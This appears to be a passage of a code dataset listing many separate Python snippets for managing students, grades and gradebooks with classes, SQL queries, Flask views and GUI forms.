[ "def add_student(self, name: str, grade: int) -> None:\n school_grade = self.students.setdefault(grade, [])\n school_grade.append(name)\n school_grade.sort()", "def __init__(self):\n self.students = []\n self.grades = {}\n self.isSorted = True", "def add_student():\n\n\tprint('You must enter the student as is:\\n'\n\t\t\"'First name', 'middle name', 'Last name', 'major', 'major', 'gpa', id_number, 'minor'\"\n\t\t\" 'minor' graduation year, advisor number\\n For example: 'Kyle', 'Jacob', 'Ranney', 'Insurance'\"\n\t\t\", 'Chemistry', 3.0, 93988, 'Biology', 'NULL', 2016, 2234\\n\")\n\t# use sql insert statement\n\t# become familiar with this!\t", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def __init__(self, first_name, last_name, address):\n\n self.first_name = first_name\n self.last_name = last_name\n self.address = address\n\n # Creates dictionary for each student with the label & info.\n\n self.info = {\n 'first name': self.first_name,\n 'last name': self.last_name,\n 'address': self.address,\n }", "def __init__(self):\n self.students = []\n self.grades = {}\n self.is_sorted = True", "def students_data():\n\n return [\n {'name': 'Alexey', 'rate': 2, 'course': 'Python'},\n {'name': 'Vali', 'rate': 5, 'course': 'Java'},\n {'name': 'Olga', 'rate': 4, 'course': 'Python'},\n {'name': 'Frank', 'rate': 5, 'course': 'Python'},\n {'name': 'Masha', 'rate': 3, 'course': 'Java'},\n {'name': 'Vasily', 'rate': 2, 'course': 'Java'},\n {'name': 'Daria', 'rate': 3, 'course': 'Python'},\n {'name': 'Nickname', 'rate': 4, 'course': 'Python'},\n {'name': 'Fort', 'rate': 3, 'course': 'Java'},\n {'name': 'Lama', 'rate': 4, 'course': 'Java'},\n {'name': 'Pop', 'rate': 2, 'course': 'Python'},\n {'name': 'Sort', 'rate': 3, 'course': 'Python'},\n {'name': 'Elya', 'rate': 5, 'course': 'Java'},\n {'name': 'Tolik', 'rate': 4, 'course': 'Python'},\n ]", "def __init__(self):\n self.students = [] # List of Student objects.\n self.grades = {} # Dictionary to map IDNumber -> list of grades.\n self.isSorted = True # True if self.students is sorted.", "def __init__(self, name, surname):\n\t\t\n\t\tself.grades = {}\n\t\tself.attendance = 0\n\t\t\n\t\tif not (isinstance(name, str) and isinstance(surname, str)):\n\t\t\tname, surname = \"None\", \"None\"\n\t\tself.name, self.surname = name, surname", "def __init__(self):\n self.students=[]\n self.grades={}\n self.isSorted=True", "def __init__(self): \r\n self.students = [] #list of students\r\n self.grades = {} #id Num -> list of grades\r\n self.isSorted = True", "def make_gradebook(roster, grades, sub_info):\n gradebook = []\n for student in roster.keys():\n s = {}\n # fill student file with evaluation grades\n for day, score in zip(sub_info.keys(), grades):\n s[str(day)] = score[student]\n s['total'] = sum(s.values())\n s['username'] = student\n gradebook.append(s)\n return gradebook", "def update_course_info(self, grades_file_info):\n grades_file = os.path.join(self.path, \"grades.txt\")\n sep, header = grades_file_info\n try:\n for info in file_reading_gen(grades_file, 4, sep, header):\n # StudentID | Course | Grade | InstructorID\n student_id = info[0]\n course_code = info[1]\n grade = info[2]\n instructor_id = info[3]\n\n if student_id not in self.students:\n raise KeyError(\"Student with student id {} does not exists in students.txt\".format(student_id))\n if instructor_id not in self.instructors:\n raise KeyError(\"Instructor with instructor id {} does not exists in 
instructors.txt\".format(instructor_id))\n\n student = self.students[student_id]\n instructor = self.instructors[instructor_id]\n\n student.courses_completed.add(course_code)\n student.grades[course_code] = grade\n\n instructor.courses_taught.add(course_code)\n instructor.student_count[course_code] += 1\n except ValueError:\n raise ValueError(\"Invalid data in grades.txt\")\n except FileNotFoundError as e:\n print('Missing grades.txt.\\n' + str(e))", "def add_student(self, student):\n if student in self.students:\n raise ValueError('Duplicate Student.')\n self.students.append(student)\n self.grades[student.id] = []\n self.is_sorted = False", "def add_grades(self, subject_name, grade_list, attendance=True): \n\t\n\t\tif (isinstance(subject_name, str) and isinstance(grade_list, list)):\n\t\t\tfor grade in grade_list:\n\t\t\t\tself.grades.setdefault(subject_name, []).append(grade)\n\t\t\tself.attendance += 1 if attendance else 0", "def __init__(self, name, skill):\n \n super(Student, self).__init__(name)\n self.grades = []\n self.skill = skill", "def addStudent(self, student):\n if student in self.students:\n raise ValueError(\"Duplicate Student\")\n self.students.append(student)\n self.grades[student.getIDNumber()] = []\n self.isSorted = False", "def add_student(user_inputs):\r\n no_space = (remove_space(user_inputs))\r\n student_tuple = student_info._make(no_space.split(\",\"))\r\n StudentRoster.append(student_tuple)", "def add_student(self, student: 'Student') -> None:\n # Add HOUSEHOLD attributes to the schools' composition\n self.total += 1\n self.composition += student.household.attributes\n self.students[student.idx] = student\n self.has_space = (self.total < self.capacity)", "def _create_students(self):\n def mktime(str_date):\n return time.mktime(time.strptime(\n str_date, CountSkillCompletion.DATE_FORMAT))\n self.day1 = '2015-01-01'\n self.day2 = '2015-01-02'\n self.day3 = '2015-01-03'\n self.day4 = '2015-01-04'\n c = SkillCompletionTracker.COMPLETED\n p = SkillCompletionTracker.IN_PROGRESS\n # progress string for students\n students_progress = [\n {self.skill1.id : {c: mktime(self.day2), p: mktime(self.day1)},\n self.skill2.id : {c: mktime(self.day4), p: mktime(self.day1)}},\n {self.skill1.id : {c: mktime(self.day2), p: mktime(self.day2)},\n self.skill2.id : {p: mktime(self.day1)}},\n {self.skill1.id : {c: mktime(self.day1)}},\n {} # No progress\n ]\n for index, progress in enumerate(students_progress):\n student = models.Student(user_id=str(index))\n student.put()\n comp = models.StudentPropertyEntity.create(\n student=student,\n property_name=SkillCompletionTracker.PROPERTY_KEY)\n comp.value = transforms.dumps(progress)\n comp.put()", "def add_students() -> None:\r\n faculties = [\"Computer Science\", \"Performing Arts\", \"Engineering\", \"Economics\"]\r\n for faculty in faculties:\r\n for _ in range(50):\r\n create_student(faculty)", "def save_grades(self):\r\n try:\r\n try:\r\n self.grades.append(int(app.entry1.get()))\r\n self.grades.append(int(app.entry2.get()))\r\n self.grades.append(int(app.entry3.get()))\r\n self.grades.append(int(app.entry4.get()))\r\n self.grades.append(int(app.entry5.get()))\r\n except:\r\n app.info.configure(text='INFO: Warning, The Type of the Grade is incorrect.')\r\n # If the user pressed on 'Save Grades' with an entry value other than 'int', 'Info' Label shows the message:\r\n # \"INFO: Warning, The Type of the Grade is incorrect.\"\r\n number=5\r\n for index in range(len(self.grades)):\r\n open_data.student[open_data.name][number] = 
self.grades[index]\r\n number += 1\r\n self.grades=[]\r\n open_data.show_data()\r\n except AttributeError:\r\n if len(app.tree.get_children()) == 0:\r\n app.info.configure(text=\"INFO: Please Load the Files First.\", font=('', '7'))\r\n # If the user pressed on the treeview before loading the file, 'Info' Label shows the message:\r\n # 'INFO: Please Load The Files First.'\r\n except:\r\n app.info.configure(text=\"INFO: Warning, The Type of the Grade is incorrect.\", font=('', '7'))\r\n # If the user enters invalid type, it will give that warning.\r", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline discipline_name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! \\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def create_local_school():\n students = Student.create_by_csv(\"data/students.csv\")\n mentors = Mentor.create_by_csv(\"data/mentors.csv\")\n return students, mentors", "def students(self):\n\t\treturn self.grade_set.all().distinct()", "def add_student_data(connection,fname,lname,class_n,marks):\r\n with connection:\r\n connection.execute(INSERT_STUDENT,(fname,lname,class_n,marks))", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n title_grade_list = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n title_grade_list=title_grade_list)\n\n return html", "def main():\n given_scores = []\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def get_grade_by_student(first_name):\n\n QUERY = \"\"\"\n SELECT g.project_title, g.grade \n FROM Students AS s JOIN Grades AS g \n ON s.github = g.student_github\n WHERE s.first_name = ?\n \"\"\"\n\n db_cursor.execute(QUERY, (first_name,))\n row = db_cursor.fetchall()\n \n if row != []:\n for project in row:\n print 'Grade for %s: %s' %(project[0], project[1])\n else:\n print 'Please try again and enter a FIRST NAME'", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n grades = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n grades=grades)\n\n return html", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n # a list of (project_title, grade) for a given student\n titles_grades = hackbright.get_grades_by_github(github)\n\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n titles_grades=titles_grades)\n\n return html", "def _save_section_scores(self, section_scores):\n l = []\n for section in section_scores:\n d = {\n 'name': section['name'],\n 'score': section['auto_score'],\n 'max_score': 
section['max_score'],\n\t\t'failed_tests': section['failed_tests']\n }\n l.append(d)\n self.student_section_scores = l", "def get_students(self, student_file_info):\n students_file = os.path.join(self.path, \"students.txt\")\n sep, header = student_file_info\n try:\n for student in file_reading_gen(students_file, 3, sep, header):\n # CWID | Name | Major\n cwid = student[0]\n name = student[1]\n major = student[2]\n self.students[cwid] = Student(cwid, name, major)\n except ValueError:\n raise ValueError(\"Invalid data in students.txt\")\n except FileNotFoundError as e:\n print('Missing students.txt.\\n' + str(e))", "def students(self):\n return self._parser.students", "def _create_students_with_state(self, num_students, state=None, grade=0, max_grade=1):\r\n self.define_option_problem(PROBLEM_URL_NAME)\r\n students = [\r\n UserFactory.create(username='robot%d' % i, email='robot+test+%d@edx.org' % i)\r\n for i in xrange(num_students)\r\n ]\r\n for student in students:\r\n CourseEnrollmentFactory.create(course_id=self.course.id, user=student)\r\n StudentModuleFactory.create(course_id=self.course.id,\r\n module_state_key=self.location,\r\n student=student,\r\n grade=grade,\r\n max_grade=max_grade,\r\n state=state)\r\n return students", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n rows = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n rows=rows)\n # return html", "def __str__(self):\n return str(self.__student_name) + \" has grade \" + str(self.__grade_value) + \" at \" + str(self.__discipline_name)", "def create_student(faculty: str) -> None:\r\n global usernames, pointer, student_file_info\r\n username = usernames[pointer]\r\n password = username[:6][::-1]\r\n student_file_info.append([username, password, faculty])\r\n pointer += 1", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def _gradesets_and_errors_for(self, course_id, students):\r\n students_to_gradesets = {}\r\n students_to_errors = {}\r\n\r\n for student, gradeset, err_msg in iterate_grades_for(course_id, students):\r\n students_to_gradesets[student] = gradeset\r\n if err_msg:\r\n students_to_errors[student] = err_msg\r\n\r\n return students_to_gradesets, students_to_errors", "def AddStudent(self, event):\n pass", "def student_view_data(self):\n def get_student_profile_data():\n # pylint: disable=no-member\n \"\"\"\n Returns profile data for all students on the course.\n \"\"\"\n try:\n regexp_string = self.regexp_from_users_included_email(self.users_included_email)\n re.compile(regexp_string)\n users = self.students_for_course(regexp_string)\n except:\n log.info(\"regexp is invalid: '%s'\", regexp_string)\n users = []\n\n for user in users:\n student_id = anonymous_id_for_user(user, self.course_id)\n profile = user.profile\n\n vip = self.get_vip(user)\n image_url = None\n if vip:\n image_url = \"https://my.imd.org/api/profile/{}/profile-picture-header\".format(vip)\n else:\n if self.is_course_staff:\n image_url = self.runtime.local_resource_url(self, 'public/images/profile-picture-header-no-vip.gif')\n else:\n image_url = self.runtime.local_resource_url(self, 
'public/images/profile-picture-header.gif')\n\n cohort_name = None\n if (self.is_course_cohorted(self.course_id)):\n cohort_name = self.get_cohort(user, self.course_id).name\n\n yield {\n 'student_id': student_id,\n 'username': user.username,\n 'fullname': profile.name,\n 'vip': vip,\n 'image_url': image_url,\n 'email': user.email,\n 'cohort_name': cohort_name,\n }\n\n return {\n 'student_profile_list': list(get_student_profile_data()),\n 'display_name': self.display_name,\n 'username': self.logged_in_username,\n 'course_is_cohorted': self.enable_cohorts and self.is_course_cohorted(self.course_id),\n 'profile_display': {\n 'profile_display_job_title': self.profile_display_job_title,\n 'profile_display_organisation': self.profile_display_organisation,\n 'profile_display_work_country': self.profile_display_work_country,\n 'profile_display_email_button': self.profile_display_email_button,\n 'profile_display_bio': self.profile_display_bio,\n },\n }", "def __ui_list_grades_by_student(self):\n student_id = input(\"Give student ID: \")\n try:\n list_of_grades = self.__grade_controller.get_grades_by_student(student_id)\n if len(list_of_grades) == 0:\n print(\"Student doesn't have any grade.\")\n return\n\n for g in list_of_grades:\n print(str(g))\n\n except GradeException as ge:\n print(ge)\n return", "def import_previous_grades_into_db(year, semester, db_name='./grades.sqlite3', filename='./grades.xls'):\n if not os.path.isfile(db_name):\n raise Exception(\"DB not found\")\n\n df1 = pd.read_excel(filename)\n\n try:\n cls = df1.filter(like='CL')\n except Exception as e:\n print(e)\n cls = None # no CLA's found\n\n try:\n ols = df1.filter(like='OL')\n except Exception as e:\n print(e)\n ols = None # no OLAs found\n\n try:\n ids = df1.filter(like='sername').values.ravel().tolist()\n ids_len = len(ids)\n except Exception as e:\n print('Was not able to parse user ids, check xls file you are trying to import: ', e)\n raise e # may be improved in the future - strange case\n try:\n names = df1.filter(like='Name').values.ravel().tolist()\n except Exception as e: # either does not exist or has different name\n print(e)\n names = None\n\n class_dict = get_ids_in_class_by_year_semester(year, semester, db_name)\n\n if (not class_dict and not names) or (class_dict and len(class_dict) < ids_len and not names):\n raise Exception('Did not find ids in table CLASS and did not find names in xls file')\n elif names and (not class_dict or (class_dict and len(class_dict) < ids_len)):\n print('Did not find existing students, but found names in xsl\\nAdding new students...\\n')\n existing_ids = get_pipeline_ids(db_name)\n need_to_update_students = False\n # otherwise just add ids to the class list\n if existing_ids:\n for sid in ids:\n if sid not in existing_ids:\n need_to_update_students = True\n else:\n need_to_update_students = True\n\n if need_to_update_students:\n fname, lname = zip(*(name.split(', ') for name in names))\n fname = (name.strip() for name in fname)\n lname = (name.strip() for name in lname)\n insert_students(ids, fname, lname, db_name)\n register_students_in_class(ids, year, semester, db_name)\n\n class_ids = [class_dict[sid] for sid in ids]\n if ols is None and cls is None or len(class_ids) == 0:\n raise Exception('No grades to load')\n\n grades_tupples = list()\n if ols is not None:\n for lab_name in ols:\n grades = (str(grade) for grade in ols[lab_name].values)\n grades_tupples += list(zip(class_ids, [lab_name] * ids_len, [-1] * ids_len, grades, ['TRUE'] * ids_len))\n\n if cls is not None:\n for 
lab_name in cls:\n grades = (str(grade) for grade in cls[lab_name].values)\n grades_tupples += list(zip(class_ids, [lab_name] * ids_len, [-1] * ids_len, grades, ['TRUE'] * ids_len))\n\n with lite.connect(db_name) as con:\n cur = con.cursor()\n cur.executemany('INSERT OR REPLACE INTO grades\\\n (class_id, lab, attempt, grade, pass_fail) VALUES (?, ?, ?, ?, ?)', grades_tupples)\n con.commit()", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n project_list = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n project_list=project_list)", "def grade(self, grade_number: int):\n return self.students.setdefault(grade_number, [])", "def view_student_gradebook():\n\n user_id = session.get('user_id')\n courses = []\n grades = []\n con = db.get_db()\n cur = con.cursor()\n\n cur.execute(\"\"\"SELECT DISTINCT courses.course_id, (ROUND(sum(grades.points_received)/sum(grades.total_points), 2 )*100)\n as total_grade, roster.session_id as class_session,\n courses.name as class_name, users.name AS teacher_name, grades.student_id\n FROM courses JOIN sessions on courses.course_id = sessions.course_id\n\t\t\t\t JOIN users on courses.teacherid= users.id\n JOIN assignments on assignments.session_id = sessions.id\n JOIN grades on grades.assignment_id = assignments.assignment_id\n JOIN roster on roster.session_id = sessions.id\n WHERE grades.student_id = %s\n\t GROUP BY grades.student_id, roster.session_id, courses.course_id, users.id\"\"\",\n (user_id,))\n courses = cur.fetchall()\n\n cur.close()\n con.close()\n\n return render_template(\"/layouts/gradebook/student_view.html\", courses=courses)", "def added_student():\n\n first = request.form.get('first_name')\n last = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n first, last, github = hackbright.get_student_by_github(github)\n\n html = render_template(\"student_added.html\", first=first, last=last, github=github)\n\n return html", "def _save_grade(self):\r\n student = self._student('POST', key='grader_id')\r\n if student is None:\r\n self._error_response()\r\n\r\n else:\r\n # Update the number of essays the student has graded\r\n student.grade_peer_essay()\r\n return self._success_response({})", "def all_students(records):\n \n student_number_and_name = {}\n for each_tuple in records:\n all_student_information = each_tuple[1]\n student_number = int(all_student_information[0])\n student_name = (all_student_information[1:3])\n \n student_number_and_name[student_number] = student_name\n \n return student_number_and_name", "def get_student_name(self):\n return self.__student_name", "def add_students(self):\n if(self.Roll_No_var.get()==\"\" or self.name_var.get()==\"\" or self.gender_var.get()==\"\" or self.contact_var.get()==\"\" or self.email_var.get()==\"\" or self.dob_var.get()==\"\" or self.pref1.get()==\"\" or self.pref2.get()==\"\" or self.pref3.get()==\"\" or self.type.get()==\"\" or self.rank.get()==\"\" or self.marks.get()==\"\"):\n messagebox.showerror(\"Error\",\"All fields are Required!!\")\n else:\n con = pymysql.connect(host=\"localhost\",user=\"root\",password=\"mysqlrootpasswordhere\",database=\"demodb\")\n cursor = con.cursor()\n try:\n cursor.execute(\"insert into STDB values(%s,%s,%s,%s,%s,%s,%s,%s)\",(self.Roll_No_var.get(),\n self.name_var.get(),\n self.email_var.get(),\n self.gender_var.get(),\n 
self.contact_var.get(),\n self.dob_var.get(),\n self.txt_Address.get(\"1.0\",END),\n self.stud_id_var.get()\n ))\n cursor.execute(\"insert into preference values(%s,%s,%s,%s)\",(self.Roll_No_var.get(),\n self.pref1.get(),\n self.pref2.get(),\n self.pref3.get()))\n cursor.execute(\"insert into qualification values(%s,%s,%s,%s)\",(self.Roll_No_var.get(),\n self.type.get(),\n self.rank.get(),\n self.marks.get()))\n \n con.commit()\n self.fetch_data()\n self.clear()\n con.close()\n messagebox.showinfo(\"Success\",\"Record has been Inserted\")\n except pymysql.err.InternalError:\n messagebox.showerror(\"Error\",\"App_id,Qualification rank , Qualification Marks Should be Integer\")\n self.Roll_No_var.set(\"\")\n self.rank.set(\"\")\n self.marks.set(\"\")\n except pymysql.err.IntegrityError:\n messagebox.showerror(\"Error\",\"Application Id is Already Exist Use Different Application Id\")\n self.Roll_No_var.set(\"\")", "def __init__(self, idy, name):\n self.idy = idy\n self.name = name\n self.active = True\n self.grades = {}", "def get_student_grade(class_id):\n grades = []\n quiz_grade = query_db(\n \"SELECT quizzes.name, grade FROM quiz_grades JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id \"\n \"WHERE student_id=? AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in quiz_grade:\n student_grade_quiz = {}\n student_grade_quiz[\"thing_name\"] = grade[0]\n student_grade_quiz[\"grade\"] = grade[1]\n grades.append(student_grade_quiz)\n assignment_grade = query_db(\n \"SELECT assignments.name, grade FROM assignment_grades \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics on assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE student_id=? 
\"\n \"AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in assignment_grade:\n student_grade_assignment = {}\n student_grade_assignment[\"thing_name\"] = grade[0]\n student_grade_assignment[\"grade\"] = grade[1]\n grades.append(student_grade_assignment)\n return grades", "def create_student(**student):\n\n _student = dict.fromkeys(\n ['first_name', 'last_name', 'middle_initial', 'address', 'email', 'phone_number'])\n\n _student['first_name'] = student.get('first_name', 'N/A')\n _student['last_name'] = student.get('last_name', 'N/A')\n _student['middle_initial'] = student.get('middle_initial', 'N/A')\n\n _student['address'] = student.get('address', 'N/A')\n _student['email'] = student.get('email', 'N/A')\n _student['phone_number'] = student.get('phone_number', 'N/A')\n\n return _student", "def addStud(self,ID,name,attNr,grade):\n if ID < 0: raise Exception(\"Invalid ID!\")\n parts = name.split(' ')\n if len(parts) < 2: raise Exception('Invalid name!')\n for part in parts:\n if len(part)<3: raise Exception('Invalid name!')\n if attNr < 0: raise Exception('Invalid number of attendances!')\n if grade not in range(0,11): raise Exception('Invalid grade!')\n self.__studRepo.add(Student(ID,name,attNr,grade))", "async def school(self, ctx:commands.Context, *school_name):\r\n\r\n school_name = ' '.join(school_name)\r\n if not school_name in list(self.fish_schools.keys()):\r\n await ctx.send(f'{school_name} is not a valid school')\r\n return\r\n\r\n curr_school = self.fish_schools[school_name]\r\n member_school = (await self.config.member(ctx.message.author).schools()).get(school_name, {})\r\n description = ''\r\n for i in curr_school:\r\n description += (f'{i}: {member_school[i]} inches' if i in member_school else '???') + '\\n'\r\n embed = Embed(title=school_name, description=description[:-1])\r\n embed.set_thumbnail(url=schools_image)\r\n await ctx.send(embed=embed)", "def __init__(self, first, last, email, grade):\n self.first_name = first\n self.last_name = last\n self.email = email\n self.grade = grade", "def createStudent(self):\n self.createProfile()\n from soc.modules.gsoc.models.profile import GSoCStudentInfo\n properties = {'key_name': self.profile.key().name(), 'parent': self.profile}\n self.profile.student_info = seeder_logic.seed(GSoCStudentInfo, properties)\n self.profile.put()", "def prepare_student_data(self) -> dict:\n self._filename_pre_data()\n empty_student = {}\n empty_student[\"scoreTimestamp\"] = \"N/A\"\n for i in self.draft_out:\n empty_student[i] = \"N/A\"\n for i in self.pre_data:\n empty_student[i] = self.pre_data[i]\n self.pre_data = empty_student", "def all_students(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for student in all_students:\n print(student)", "def get_grades(self, student):\n try:\n return self.grades[student.id][:] # notice that a copy is returned\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def 
all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.first_name,\n s.Last_name,\n s.slack_handle,\n s.cohort_id,\n c.name\n from students s\n join cohorts c on s.cohort_id = c.id\n order by s.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Students***')\n\n for student in all_students:\n print(student)", "def create_students():\n\n\t# create empty list\n\tstudent_list = []\n\n\t# import student classces\n\tstudent_list = create_student_class()\n\n\treturn student_list", "def get_student_grade_summary_data(request, course, get_grades=True, get_raw_scores=False, use_offline=False):\r\n course_key = course.id\r\n enrolled_students = User.objects.filter(\r\n courseenrollment__course_id=course_key,\r\n courseenrollment__is_active=1,\r\n ).prefetch_related(\"groups\").order_by('username')\r\n\r\n header = [_('ID'), _('Username'), _('Full Name'), _('edX email'), _('External email')]\r\n\r\n datatable = {'header': header, 'students': enrolled_students}\r\n data = []\r\n\r\n gtab = GradeTable()\r\n\r\n for student in enrolled_students:\r\n datarow = [student.id, student.username, student.profile.name, student.email]\r\n try:\r\n datarow.append(student.externalauthmap.external_email)\r\n except: # ExternalAuthMap.DoesNotExist\r\n datarow.append('')\r\n\r\n if get_grades:\r\n gradeset = student_grades(student, request, course, keep_raw_scores=get_raw_scores, use_offline=use_offline)\r\n log.debug('student={0}, gradeset={1}'.format(student, gradeset))\r\n with gtab.add_row(student.id) as add_grade:\r\n if get_raw_scores:\r\n # TODO (ichuang) encode Score as dict instead of as list, so score[0] -> score['earned']\r\n for score in gradeset['raw_scores']:\r\n add_grade(score.section, getattr(score, 'earned', score[0]))\r\n else:\r\n for grade_item in gradeset['section_breakdown']:\r\n add_grade(grade_item['label'], grade_item['percent'])\r\n student.grades = gtab.get_grade(student.id)\r\n\r\n data.append(datarow)\r\n\r\n # if getting grades, need to do a second pass, and add grades to each datarow;\r\n # on the first pass we don't know all the graded components\r\n if get_grades:\r\n for datarow in data:\r\n # get grades for student\r\n sgrades = gtab.get_grade(datarow[0])\r\n datarow += sgrades\r\n\r\n # get graded components and add to table header\r\n assignments = gtab.get_graded_components()\r\n header += assignments\r\n datatable['assignments'] = assignments\r\n\r\n datatable['data'] = data\r\n return datatable", "def _enroll_students_in_course(self, course_id, num_students):\r\n\r\n for _ in range(num_students):\r\n random_id = uuid4().hex[:8]\r\n self.create_student(username='student{0}'.format(random_id))", "def insert_students(ids, fname, lname, db_name='./grades.sqlite3'):\n names_tupple = list(zip(ids, fname, lname, [0] * len(ids)))\n with lite.connect(db_name) as con:\n cur = con.cursor()\n cur.executemany('INSERT OR REPLACE INTO STUDENTS \\\n (pipeline_id, first_name, second_name, cheating_ratio)'\n ' VALUES (?, ?, ?, ?)', names_tupple)\n con.commit()", "def __str__(self):\n return \"student:\"+str(self.name)+\":\"+str(self.age)+\":\"+str(self.major)", "def get_student():\n\n github = request.args.get('github')\n if not github:\n return \"Please enter a student!\"\n\n student = hackbright.get_student_by_github(github)\n\n grades = hackbright.get_grades_by_github(github)\n\n if not 
student:\n return \"There is no student with github \\\"{}\\\".\".format(github)\n\n first, last, github = student\n # return \"{acct} is the GitHub account for {first} {last}\".format(\n # acct=github, first=first, last=last)\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n grades=grades)\n return html", "def addStudent():\n name = input(\"Name: \")\n number = input(\"Number: \")\n gpa = input(\"GPA: \")\n field = input(\"Field: \")\n student = Student(name, number, gpa, field)\n if t.insert(number, student):\n ht.insert(student)\n print(name, \"added successfully.\")\n else:\n print(\"student number is not valid.\")", "def __init__(self,student_id,lname,fname, major='Computer Science',gpa='0.0'):\n super().__init__(lname,fname) # Call init on parent class\n self._student_id = student_id\n self._major = major\n self._gpa = gpa", "def post_instructor():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n if request.form['password'] != config['instructor_password']:\n return \"Sorry, wrong password.\"\n\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n grades = json.loads(populate(\"{}{}\".format(UPLOAD_FOLDER,(file.filename).replace(\" \", \"_\"))))\n\n for student in grades:\n try:\n db.session.delete(User.query.filter_by(hash=student).first())\n except UnmappedInstanceError:\n pass\n sqlStudent = User(student, grades[student])\n # sqlStudent = User.query.filter_by(hash=student).first()\n # sqlStudent.grades = grades[student]\n db.session.add(sqlStudent)\n\n db.session.commit()\n\n return \"Grades Updated. Success!\"", "def make_new_student(first_name, last_name, github):\n QUERY = \"\"\"INSERT INTO Students VALUES(?,?,?)\"\"\"\n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def __init__(self, name):\n self.name = name\n self.maxidy = -1\n self.studentlist = []", "def get_all_grades(first_name, last_name):\n QUERY = \"\"\" SELECT s.first_name, s.last_name, g.project_title, g.grade \n FROM Students AS s \n INNER JOIN Grades AS g ON s.github = g.student_github\n WHERE s.first_name = ? AND s.last_name = ? 
\"\"\"\n db_cursor.execute(QUERY, (first_name, last_name))\n grades_data = db_cursor.fetchone()\n print grades_data[-1]", "def get_list_of_students(self):\n return self._students", "def __init__(self, name, ssn, address, courses_grades=None):\n super().__init__(name, ssn, address)\n if courses_grades is None:\n courses_grades = []\n if courses_grades == isinstance(courses_grades, list):\n self.courses_grades = courses_grades\n else:\n self.courses_grades = list(courses_grades)", "def __init__(self, name, age, student_id, courses):\n self.name = name\n self.age = age\n self.student_id = student_id\n self.courses = courses\n\n # When adding a student, increment the\n # class variable student_count\n Student.student_count += 1", "def print_students_gpa(std):\n print (\"Student Id:\", get_id(std))\n print (\"Student name:\", get_fname(get_name(std)), get_lname(get_name(std)))\n print (\"GPA: %.2f\" %(calc_gpa(std)))", "def student_state(self):\n submission = self.get_submission()\n if submission:\n uploaded_submission = submission.get(\"answer\").get(\"filename\", None)\n if uploaded_submission:\n uploaded = {\"filename\": submission['answer']['filename']}\n else:\n uploaded = None\n else:\n uploaded = None\n\n submission = self.get_question()\n if submission:\n uploaded_submission = submission.get(\"question\").get(\"filename\", None)\n if uploaded_submission:\n quploaded = {\"filename\": submission['question']['filename']}\n else:\n quploaded = None\n else:\n quploaded = None\n\n submission = self.get_solution()\n if submission:\n uploaded_submission = submission.get(\"solution\").get(\"filename\", None)\n if uploaded_submission:\n suploaded = {\"filename\": 